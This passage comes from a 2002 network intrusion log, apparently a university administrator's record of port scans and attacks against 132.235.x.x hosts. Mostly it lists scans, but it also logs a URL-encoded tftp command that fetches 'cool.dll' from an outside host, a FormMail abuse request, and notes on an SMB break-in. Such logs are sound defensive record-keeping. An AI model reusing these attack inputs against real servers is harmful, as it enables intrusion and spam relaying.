(ABordeaux-103-1-2-71.abo.wanadoo.fr) scannet for ports 21 2002/10/28-12:50:27.34 211.184.106.1 () scannet for ports 80 2002/10/28-13:17:54.23 66.141.123.224 (ppp-66-141-123-224.dialup.eulstx.swbell.net) scannet for ports 80 139 445 2002/10/28-13:26:29.10 80.59.72.212 (212.Red-80-59-72.pooles.rima-tde.net) scannet for ports 139 2002/10/28-13:31:07.98 66.141.123.224 (ppp-66-141-123-224.dialup.eulstx.swbell.net) 1 heavy scan of net ports 139,445 til 14:35:00.38 2002/10/28-14:02:57.13 217.85.139.163 (pD9558BA3.dip.t-dialin.net) attack NT machine via smb, break in, set up ftp server. 2002/10/28-14:51:45.22 217.136.16.211 (211.16-136-217.adsl.skynet.be) scannet for ports 21 2002/10/28-16:36:57.47 195.175.112.40 (nwusr-8231.dial-in.ttnet.net.tr)1. stupid anon ftp attack,including "RETR /dev/Apr 17 2002 tcp" 2002/10/28-16:36:57.47 195.175.112.40 (nwusr-8231.dial-in.ttnet.net.tr)2. and use of cracked passwd from dummy passwd file 2002/10/28-18:28:31.37 217.208.70.68 (h68n2fls33o891.telia.com) scannet for ports 80 2002/10/28-18:42:50.09 80.138.252.72 (p508AFC48.dip.t-dialin.net) scannet for ports 445 2002/10/28-18:43:24.06 217.208.70.68 (h68n2fls33o891.telia.com) scannet for ports 80 2002/10/28-18:54:52.57 168.93.100.112 () scannet for ports 443 2002/10/28-21:14:14.49 24.208.183.228 (dhcp024-208-183-228.columbus.rr.com) scannet for ports 13 ports 2002/10/28-21:54:28.99 24.214.108.49 (user-24-214-108-49.knology.net) scannet for ports 445 80 2002/10/28-22:01:00.36 24.214.108.49 (user-24-214-108-49.knology.net) attack 132.235.4.22:445 2002/10/29-01:39:00.29 209.5.243.3 (wc1.mb.skyweb.ca) scannet for ports 80 2002/10/29-01:39:36.23 204.50.169.151 (204-50-169-151.mb.skyweb.ca) attack on 132.235.1.[89,90] ports 445,135 til 01:43:31.01 2002/10/29-01:39:37.30 204.50.169.151 (204-50-169-151.mb.skyweb.ca) scannet for ports 445 139 2002/10/29-01:45:15.21 80.138.220.69 (p508ADC45.dip.t-dialin.net) heavy attack on 132.235.1.90 ports 445,135 til 01:48:13.98 2002/10/29-01:46:08.38 218.104.200.74 () scannet for ports 8 ports 2002/10/29-04:41:26.20 210.58.19.193 (193.c19.ethome.net.tw) scannet for ports 80 2002/10/29-04:41:44.47 211.76.97.230 () scannet for ports 80 2002/10/29-04:42:12.30 211.76.97.229 () scannet for ports 80 2002/10/29-04:42:28.72 211.76.97.248 () scannet for ports 80 2002/10/29-06:43:48.51 61.199.200.219 (pc3.yoshikawa-unet.ocn.ne.jp) scannet for ports 1433 2002/10/29-07:54:36.12 193.96.193.222 () scannet for port 139 2002/10/29-07:55:59.59 203.147.55.174 () scannet for port 139 2002/10/29-07:57:00.12 200.171.41.209 (200-171-41-209.dsl.telesp.net.br) scannet for port 139 2002/10/29-08:23:44.53 66.110.140.153 (adsl-66.110.140-153.globetrotter.net) scannet for port 139 2002/10/29-08:40:35.59 61.11.34.113 () scannet for port 139 2002/10/29-09:10:57.22 216.7.34.191 (prosser2-191.bentonrea.com) scannet for port 139 2002/10/29-09:44:52.33 216.78.40.248 (host-216-78-40-248.ath.bellsouth.net) scannet for port 139 2002/10/29-10:11:51.24 200.163.52.217 (200-163-52-217-pvoce200.dial.telebrasilia.net.br) scannet for port 139 2002/10/29-10:11:56.14 80.9.107.185 (Mix-Strasbourg-209-4-185.abo.wanadoo.fr) scannet for port 139 2002/10/29-10:29:07.32 218.24.8.212 () scannet for port 139 2002/10/29-10:43:43.18 218.152.126.241 () scannet for port 139 2002/10/29-10:44:39.26 217.141.182.29 (host29-182.pool217141.interbusiness.it) scannet for port 139 2002/10/29-11:05:37.15 131.94.148.117 (stucffa.fiu.edu) scannet for port 445 139 80 2002/10/29-11:20:12.61 200.171.128.50 (200-171-128-50.dsl.telesp.net.br) scannet for port 139 2002/10/29-12:02:21.94 62.211.199.230 () scannet for port 139 2002/10/29-12:15:32.04 212.142.146.44 (eu146-44.clientes.euskaltel.es) scannet for port 139 2002/10/29-13:05:19.27 213.6.75.135 (A4b87.pppool.de) scannet for port 139 2002/10/29-13:06:26.07 213.96.230.26 (213-96-230-26.uc.nombres.ttd.es) scannet for port 139 2002/10/29-13:34:49.54 200.247.184.160 () scannet for port 139 2002/10/29-13:59:32.35 80.49.107.69 (pa69.zlote-lany.sdi.tpnet.pl) scannet for port 139 2002/10/29-14:07:49.69 211.162.174.2 () scannet for port 139 2002/10/29-14:40:19.46 210.54.34.12 (dsl34-12.world-net.co.nz) scannet for port 139 2002/10/29-14:44:29.42 211.126.206.178 (aa2000110314003.userreverse.dion.ne.jp) scannet for port 139 2002/10/29-15:21:45.08 80.200.109.81 (81.109-200-80.adsl.skynet.be) scannet for port 139 2002/10/29-15:23:17.99 204.120.137.5 (SEW3.sou.ashlandfn.org) scannet for port 139 2002/10/29-15:47:05.41 80.139.205.88 (p508BCD58.dip.t-dialin.net) scannet for port 139 2002/10/29-16:03:29.76 200.171.237.103 (200-171-237-103.customer.telesp.net.br) scannet for port 139 2002/10/29-16:05:27.16 213.99.137.182 (213-99-137-182.uc.nombres.ttd.es) scannet for port 139 2002/10/29-16:29:55.02 212.119.82.10 () scannet for port 139 2002/10/29-17:15:49.10 141.35.162.43 (pcphys.zoo.uni-jena.de) scannet for port 139 2002/10/29-17:26:09.62 80.246.67.251 () scannet for port 139 2002/10/29-18:01:28.16 129.44.18.112 (pool-129-44-18-112.alb.east.verizon.net) scannet for port 139 2002/10/29-18:01:34.12 148.208.144.61 () scannet for port 139 2002/10/29-18:33:05.51 67.40.18.33 () scannet for port 1433 2002/10/29-18:36:13.43 4.47.70.131 (evrtwa1-ar4-4-47-070-131.evrtwa1.dsl-verizon.net) scannet for port 80 2002/10/29-19:58:13.90 208.168.208.9 (orion.peganet.net) scannet for port 139 2002/10/29-19:58:17.44 61.107.140.52 () scannet for port 21 2002/10/29-21:09:34.44 134.39.173.55 () scannet for port 445 139 2002/10/29-21:10:03.07 203.77.122.254 (host254.20377122.gcn.net.tw) scannet for port 139 2002/10/29-23:13:46.20 65.106.187.230 (w230.z065106187.nyc-ny.dsl.cnc.net) scannet for port 80 2002/10/29-23:56:10.77 203.129.254.22 (STP-Pune POP,IN) attack 132.235.16.78:80 w/command: tftp%20-i%20132.132.64.166%20GET%20cool.dll% 2002/10/30-02:06:20.27 212.194.103.5 (lns05a-8-5.w.club-internet.fr) scannet for port 21 2002/10/30-02:36:57.02 213.143.76.4 (tm.213.143.76.4.dc.telemach.net) scannet for port 80 2002/10/30-03:38:03.54 67.8.117.14 (14-117.8-67.tampabay.rr.com) scannet for port 445 139 80 2002/10/30-04:15:37.43 151.99.239.101 (giotto.centro1.interbusiness.it) scannet for port 80 2002/10/30-05:59:55.49 134.39.173.55 (Center for Information Services,Bellevue WA,US) 1. attack 132.235.1.[89,90] ports 139,445 2002/10/30-05:59:55.49 134.39.173.55 (Center for Information Services,Bellevue WA,US) 2 til 2002/10/31-04:49:55.59 2002/10/30-08:36:35.02 24.102.110.100 (CPE014080217577.cpe.net.cable.rogers.com) scannet for ports 445 2002/10/30-08:37:12.94 62.141.73.120 () scannet for ports 139 2002/10/30-09:42:10.96 194.209.195.96 (top11-096.freenet.ch) scannet for ports 139 2002/10/30-09:44:50.59 65.40.197.208 (user208.net512.nj.sprint-hsd.net) 48 ties to conn to 132.235.1.7 : 5281 TCP 2002/10/30-09:57:29.25 12.158.5.94 () scannet for ports 139 2002/10/30-10:29:56.47 148.246.151.117 () scannet for ports 139 2002/10/30-10:42:46.76 61.191.104.119 () scannet for ports 139 2002/10/30-10:42:53.19 64.171.96.175 (adsl-64-171-96-175.dsl.sndg02.pacbell.net) scannet for ports 139 2002/10/30-10:48:13.93 195.241.224.117 (xs195-241-224-117.dial.tiscali.nl) scannet for ports 139 2002/10/30-11:20:12.50 200.206.243.13 (200-206-243-13.dsl.telesp.net.br) scannet for ports 139 2002/10/30-11:25:54.29 217.67.198.6 (telemobil.k.mcnet.pl) scannet for ports 139 2002/10/30-11:27:08.66 195.175.145.127 (nwusr-16766.dial-in.ttnet.net.tr) scannet for ports 139 2002/10/30-11:27:17.87 203.126.18.165 () scannet for ports 139 2002/10/30-11:35:34.69 211.201.189.24 () scannet for ports 139 2002/10/30-11:36:23.03 200.38.1.191 (red-corb1-200381-191.telnor.net) scannet for ports 139 2002/10/30-12:47:47.46 151.99.137.116 () scannet for ports 139 2002/10/30-12:59:53.18 148.243.43.35 (na-148-243-43-35.na.avantel.net.mx) scannet for ports 139 2002/10/30-12:59:58.53 211.57.160.114 () scannet for ports 139 2002/10/30-13:45:50.88 64.108.76.91 (adsl-64-108-76-91.dsl.lgnnmi.ameritech.net) scannet for ports 139 2002/10/30-13:58:49.23 210.105.133.164 () scannet for ports 139 2002/10/30-14:01:34.63 211.245.121.99 () scannet for ports 139 2002/10/30-14:19:04.88 64.170.90.178 (adsl-64-170-90-178.dsl.lsan03.pacbell.net) scannet for ports 80 2002/10/30-14:25:28.52 200.60.202.120 (client-200.60.202.120-speedy.net.pe) scannet for ports 139 2002/10/30-14:38:32.40 204.233.38.18 () scannet for ports 80 443 2002/10/30-14:58:52.94 200.207.127.231 (200-207-127-231.dsl.telesp.net.br) scannet for ports 139 2002/10/30-15:07:04.78 200.254.220.4 () scannet for ports 139 2002/10/30-15:07:11.55 218.159.80.57 () scannet for ports 139 2002/10/30-15:09:46.54 80.200.232.66 (66.232-200-80.adsl.skynet.be) scannet for ports 139 2002/10/30-15:18:19.17 200.151.155.225 (SHASTA155225.ig.com.br) scannet for ports 139 2002/10/30-15:53:35.02 200.188.182.167 (nas3-167.estaminas.com.br) scannet for ports 139 2002/10/30-18:34:20.60 149.225.102.32 (1Cust32.tnt3.hnr2.deu.da.uu.net) scannet for ports 80 2002/10/30-18:50:52.67 132.203.23.93 (ip-23-093.fsa.ulaval.ca) scannet for ports 80 2002/10/30-18:53:18.27 152.9.59.16 () scannet for ports 139 524 445 2002/10/30-19:57:27.25 196.40.79.5 () scannet for ports 139 2002/10/30-20:29:12.53 211.192.67.123 (Kookmin University,KR) 2002/10/30-20:29:24.74 211.192.67.123 () scannet for ports 445 139 2002/10/30-20:32:20.00 218.145.165.161 () scannet for ports 139 2002/10/30-20:52:21.86 12.222.5.210 (12-222-5-210.client.insightBB.com) scannet for ports 445 2002/10/30-23:40:27.45 211.172.112.2 () scannet for ports 80 443 2002/10/31-00:28:20.78 200.192.132.53 (mail.integrare.com) scannet for ports 80 2002/10/31-00:32:47.45 209.10.62.166 () scannet for ports 1433 80 2002/10/31-02:52:38.55 210.178.12.111 () scannet for ports 80 2002/10/31-04:42:05.36 24.214.18.95 (user-24-214-18-95.knology.net) 1. attack web server :GET /cgi/FormMail.cgi?recipient=nobody@cs.ohiou.edu&subject=http://ace.cs.oh 2002/10/31-04:42:05.36 24.214.18.95 (user-24-214-18-95.knology.net) 3. iou.edu/cgi/FormMail.cgi/&email=John@doe.com& =is 2002/10/31-04:42:05.36 24.214.18.95 (user-24-214-18-95.knology.net) 4. anybody out there? 2002/10/31-05:31:56.62 80.117.20.248 (host248-20.pool80117.interbusiness.it) scannet for ports 6112 1524 2002/10/31-08:25:24.28 210.249.20.194 (F020194.ppp.dion.ne.jp) scannet for port 139 2002/10/31-08:51:11.97 80.15.196.117 (AToulon-102-1-5-117.abo.wanadoo.fr) scannet for port 21 2002/10/31-09:03:29.35 80.15.196.117 (AToulon-102-1-5-117.abo.wanadoo.fr) scannet for port 21 2002/10/31-09:39:29.51 213.7.112.9 (B7009.pppool.de) scannet for port 139 2002/10/31-09:59:04.51 210.214.111.75 (dialpool-210-214-111-75.maa.sify.net) scannet for port 139 2002/10/31-10:33:36.73 217.185.120.166 (nrbg-d9b978a6.pool.mediaWays.net) scannet for port 139 2002/10/31-10:33:47.14 220.79.45.53 () scannet for port 139 2002/10/31-10:38:07.51 213.82.152.129 () scannet for port 139 2002/10/31-10:49:05.19 193.77.207.70 () scannet for port 139 2002/10/31-10:59:18.25 130.243.13.140 (pc61-409-25.Student.hig.se) scannet for port 80 1433 2002/10/31-11:17:24.39 130.243.13.140 (pc61-409-25.Student.hig.se) scannet for port 1433 80 2002/10/31-11:38:39.65 217.164.245.115 (s1b369.alshamil.net.ae) scannet for port 139 2002/10/31-11:39:43.91 63.20.89.209 (1Cust209.tnt53.ewr3.da.uu.net) scannet for port 139 2002/10/31-11:39:48.56 208.224.183.180 (ppp180-lk.zamnet.zm) scannet for port 139 2002/10/31-12:08:04.32 80.36.240.164 (164.Red-80-36-240.pooles.rima-tde.net) scannet for port 139 2002/10/31-12:08:10.06 216.201.71.207 () scannet for port 139 2002/10/31-12:42:19.76 64.173.108.187 (adsl-64-173-108-187.dsl.lsan03.pacbell.net) scannet for port 139 2002/10/31-13:01:40.22 67.84.168.121 (ool-4354a879.dyn.optonline.net) scannet for port 139 2002/10/31-13:16:59.34 161.132.189.12 () scannet for port 139 2002/10/31-13:21:18.86 211.191.52.206 () scannet for port 139 2002/10/31-14:01:22.36 208.177.157.114 (w114.z208177157.sjc-ca.dsl.cnc.net) scannet for port 21 2002/10/31-14:03:16.46 208.177.157.114 (w114.z208177157.sjc-ca.dsl.cnc.net) scannet for port 21 2002/10/31-14:11:46.95 200.168.140.123 (200-168-140-123.dsl.telesp.net.br) scannet for port 139 2002/10/31-14:11:51.95 207.76.74.93 (a2p36-ct.megahits.net) scannet for port 139 2002/10/31-14:28:54.48 212.47.229.94 (dyn-212-47-229-94.ppp.tiscali.fr) scannet for port 139 2002/10/31-14:31:35.93 62.21.166.124 () scannet for port 139 2002/10/31-14:31:40.72 148.245.60.137 (maquina137.orbis.org.mx) scannet for port 139 2002/10/31-15:44:58.12 146.187.21.172 () scannet for port 139 2002/10/31-17:01:34.07 64.81.103.37 (dsl081-103-037.den1.dsl.speakeasy.net) scannet for port 139 2002/10/31-17:24:17.27 151.39.67.70 () scannet for port 80 2002/10/31-17:27:21.55 211.217.143.125 () scannet for port 139 2002/10/31-17:27:50.75 151.39.67.70 () scannet for port 80 2002/10/31-17:50:03.03 213.114.1.25 (c-190172d5.045-18-6c756e2.cust.bredbandsbolaget.se) scannet for port 80 2002/10/31-18:08:13.85 213.114.1.25 (c-190172d5.045-18-6c756e2.cust.bredbandsbolaget.se) scannet for port 80 2002/10/31-18:09:02.37 148.233.230.65 (gpo-herdez-d32-0208-0012.uninet.net.mx) scannet for port 139 2002/10/31-18:51:21.03 61.78.6.125 () scannet for port 139 2002/10/31-18:55:17.11 209.142.8.17 (ppp-209-142-8-17.17.softcom.net) scannet for port 139 2002/10/31-18:55:22.95 61.189.216.146 () scannet for port 139 2002/10/31-19:48:12.12 66.136.111.179 () scannet for port 139 2002/10/31-20:04:22.07 155.239.194.113 (sil53-01-p113.nt.saix.net) scannet for port 139 2002/10/31-20:26:56.44 209.246.183.193 (dialup-209.246.183.193.Dial1.Atlanta1.Level3.net) scannet for port 139 2002/10/31-20:32:49.62 218.103.67.231 (ipvpn146231.netvigator.com) scannet for port 1433 2002/10/31-20:37:08.23 218.103.67.231 (ipvpn146231.netvigator.com) scannet for port 1433